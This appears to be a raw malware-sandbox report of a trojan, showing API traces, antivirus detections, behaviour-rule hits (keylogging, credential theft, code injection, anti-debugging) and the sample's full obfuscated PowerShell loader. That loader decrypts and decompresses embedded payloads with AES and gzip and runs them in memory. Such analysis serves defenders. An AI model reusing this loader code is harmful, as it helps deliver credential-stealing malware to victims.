stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat
FireEye Trojan.GenericKD.67626538
Arcabit Trojan.Generic.D407E62A
BitDefender Trojan.GenericKD.67626538
MicroWorld-eScan Trojan.GenericKD.67626538
Emsisoft Trojan.GenericKD.67626538 (B)
MAX malware (ai score=87)
GData Trojan.GenericKD.67626538
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate privileges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate privileges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat
cmdline "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt 
([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);
Process injection Process 964 resumed a thread in remote process 2252
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2252
1 0 0